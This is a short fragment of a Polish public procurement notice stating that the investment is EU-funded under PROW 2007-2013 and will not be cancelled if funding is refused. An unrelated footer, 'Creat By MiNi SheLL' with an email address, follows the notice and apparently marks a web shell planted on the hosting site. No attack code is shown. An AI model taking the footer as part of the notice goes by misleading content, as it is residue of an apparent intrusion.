<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Inwestycja  realizowana jest przy pomocy środków UE w ramach działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej objętego PROW na lata 
2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com